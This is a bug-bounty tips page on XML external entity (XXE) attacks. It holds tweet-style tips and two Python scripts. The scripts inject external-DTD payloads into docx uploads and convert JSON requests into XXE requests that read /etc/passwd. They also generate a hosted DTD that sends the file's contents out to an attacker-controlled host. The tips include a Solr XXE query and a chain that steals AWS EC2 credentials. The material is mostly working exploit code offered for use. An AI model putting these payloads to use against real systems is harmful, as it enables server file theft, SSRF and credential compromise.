Book of BugBounty Tips

XXE


Last updated 4 years ago

change password func -> JSON
converted to XML -> 200 OK
created a DTD file on my EC2 and started a web server on port 80
crafted an XXE payload!
bounty!
Always convert the POST/PUT/PATCH body to XML and resend the request; don't forget to change the Content-Type.
See an Apache Solr GET/POST to /select? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty
#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) used to grab an SVG? Try to bypass it by embedding the SVG using the Data URI protocol handler [_PAYLOAD]; most of the time it will work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity
https://twitter.com/11xuxx/status/1250764273623629826
XXE by injecting metadata in image bytes --> blind SSRF via local DTD --> grabbed AWS EC2 credentials blindly --> Pwned #bugbountytips #bugbountytip
jobs.targ.com site fills in personal info by uploading a CV and parsing it. Accepted docx, pdf, etc.
1. Unzip the docx and edit word/document.xml
2. Add <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;]>
3. Upload
4. Profit! #BugBounty
#BugBountyTip time: when you see a POST request made with JSON, convert it to XML and test for XXE. You can use the "Content-type converter" extension for @Burp_Suite to achieve this!
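The docx steps above, scripted, as an added example (this is not code from the page or from any tool it mentions). It rewrites only word/document.xml inside the zip and copies every other entry through unchanged, so the file still looks like a CV to the parser. The DTD URL is the one quoted in the tweet and is a placeholder for your own host; the sample docx is constructed inline as a stand-in for a real upload, and the script name in the usage comment is hypothetical.

```python
"""Inject an XXE DOCTYPE into word/document.xml of a .docx.

Added example; not the page's or any tool's own code. DTD_URL is a placeholder
for a host you control.
"""
import io
import zipfile

DTD_URL = "http://burp.collab.net/mal.dtd"   # from the tweet; put your own host here
TARGET_PART = "word/document.xml"


def xxe_doctype(dtd_url, root="foo"):
    """The internal subset from the tweet: a parameter entity that fetches your DTD.
    A non-validating parser does not care that `root` is not the real root element."""
    return f'<!DOCTYPE {root} [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>'


def insert_doctype(xml_text, dtd_url, strip_standalone=True):
    """Place the DOCTYPE right after the <?xml ...?> declaration (it must precede the
    root element). Word writes standalone="yes", which asserts that nothing external
    affects the document; drop it so a strict parser has no excuse to skip the DTD."""
    doctype = xxe_doctype(dtd_url)
    if not xml_text.startswith("<?xml"):
        return doctype + xml_text
    end = xml_text.index("?>") + 2
    decl, rest = xml_text[:end], xml_text[end:]
    if strip_standalone:
        decl = decl.replace(' standalone="yes"', "")
    return decl + doctype + rest


def inject_docx(docx_bytes, dtd_url=DTD_URL, part=TARGET_PART):
    """Return a new .docx whose `part` carries the XXE DOCTYPE. Every other entry is
    copied in its original order with its original compression, so the package
    structure ([Content_Types].xml first, rels, etc.) is untouched."""
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    if part not in src.namelist():
        raise KeyError(f"{part} not found in archive")
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                data = insert_doctype(data.decode("utf-8"), dtd_url).encode("utf-8")
            entry = zipfile.ZipInfo(info.filename, date_time=info.date_time)
            entry.compress_type = info.compress_type
            dst.writestr(entry, data)
    return out.getvalue()


def read_part(docx_bytes, part=TARGET_PART):
    """Read one entry of a docx as text (handy for checking the result)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(part).decode("utf-8")


def entry_names(docx_bytes):
    """Entry names in archive order."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.namelist()


def sample_docx():
    """Constructed stand-in for a real CV: the two parts a minimal docx needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr(TARGET_PART,
                   '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body><w:p><w:r><w:t>Jane Doe, jane@example.com</w:t></w:r></w:p></w:body>'
                   '</w:document>')
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:   # usage (hypothetical script name): xxe_docx.py in.docx out.docx
        with open(sys.argv[1], "rb") as f:
            original = f.read()
        with open(sys.argv[2], "wb") as f:
            f.write(inject_docx(original))
    else:
        print(read_part(inject_docx(sample_docx())))
```

Host the DTD the parameter entity points at on your server and watch for the fetch of mal.dtd; the fetch alone proves the upload parser resolves external entities, and the DTD you serve decides what happens next (file read and exfiltration, or an internal SSRF).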
https://twitter.com/Kei0x/status/1172267556226445313
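Both the change-password write-up above and the Content-type converter tip come down to the same move: serialise the JSON body as XML, prepend a DOCTYPE, and change the Content-Type. The following is an added example that does that by hand (it is not the page's code, nor the Burp extension's); it covers the in-band case, where a field the response echoes is replaced with `&xxe;`, and the blind case from the write-up, where a parameter entity pulls a DTD from your own server. The attacker host, the sample request fields and the target file path are assumptions.

```python
"""Turn a JSON request body into an XML one carrying an XXE payload.

Added example, not code from the page or from any tool it mentions. ATTACKER,
the sample fields and the default target path are assumptions.
"""
import json
import re
from xml.sax.saxutils import escape

ATTACKER = "http://attacker.example"   # assumed: the host you control (EC2, Collaborator, ...)
MARKER = "__XXE_MARKER__"              # placeholder swapped for &xxe; after escaping


def _tag(name):
    """Coerce a JSON key into something usable as an XML element name."""
    name = re.sub(r"[^A-Za-z0-9_.-]", "_", str(name))
    return name if re.match(r"[A-Za-z_]", name) else "_" + name


def to_xml(value, tag):
    """Serialise a JSON value as nested elements; text content is XML-escaped."""
    if isinstance(value, dict):
        inner = "".join(to_xml(v, _tag(k)) for k, v in value.items())
    elif isinstance(value, list):
        inner = "".join(to_xml(v, "item") for v in value)
    elif value is None:
        inner = ""
    elif isinstance(value, bool):
        inner = "true" if value else "false"
    else:
        inner = escape(str(value))
    return f"<{tag}>{inner}</{tag}>"


def build_xxe_request(json_body, echoed_field=None, oob_dtd_url=None,
                      target="file:///etc/passwd", root="root"):
    """Return (headers, body) for the XML resend of a JSON request.

    echoed_field: key whose value the response reflects; it becomes &xxe; so the
                  entity content comes back in-band.
    oob_dtd_url:  if set, use a parameter entity that fetches your DTD instead
                  (blind / out-of-band XXE, no reflection needed).
    """
    data = json.loads(json_body)
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object body")
    if oob_dtd_url:
        doctype = f'<!DOCTYPE {root} [<!ENTITY % xxe SYSTEM "{oob_dtd_url}"> %xxe;]>'
    else:
        if echoed_field not in data:
            raise KeyError(f"{echoed_field!r} is not a field of the JSON body")
        data = {**data, echoed_field: MARKER}
        doctype = f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{target}">]>'
    body = to_xml(data, root).replace(MARKER, "&xxe;")
    headers = {"Content-Type": "application/xml"}   # the step people forget
    return headers, f'<?xml version="1.0"?>{doctype}{body}'


def attacker_dtd(target="file:///etc/passwd", collector=ATTACKER + "/exfil"):
    """DTD to host on your web server for the blind case: read `target` and leak it
    in the URL of a second request. &#x25; is '%' escaped so the nested entity
    declaration survives being inside an entity value."""
    return "\n".join([
        f'<!ENTITY % file SYSTEM "{target}">',
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{collector}?d=%file;\'>">',
        "%eval;",
        "%exfil;",
    ])


if __name__ == "__main__":
    # Constructed sample: a change-password request originally sent as JSON.
    sample = '{"oldPassword": "a&b", "newPassword": "Hunter2!", "userId": 42}'
    headers, body = build_xxe_request(sample, echoed_field="newPassword")
    print(headers, body, sep="\n")
    headers, body = build_xxe_request(sample, oob_dtd_url=ATTACKER + "/x.dtd")
    print(headers, body, sep="\n")
    print(attacker_dtd())
```

Two caveats a practitioner will hit: the `&xxe;` reference only shows you anything if the server reflects that field, which is why the blind variant exists; and the hosted DTD leaks the file in a URL, so a multi-line target such as /etc/passwd will break the request on most parsers (on PHP targets the usual workaround is a php://filter base64 wrapper as the target URI).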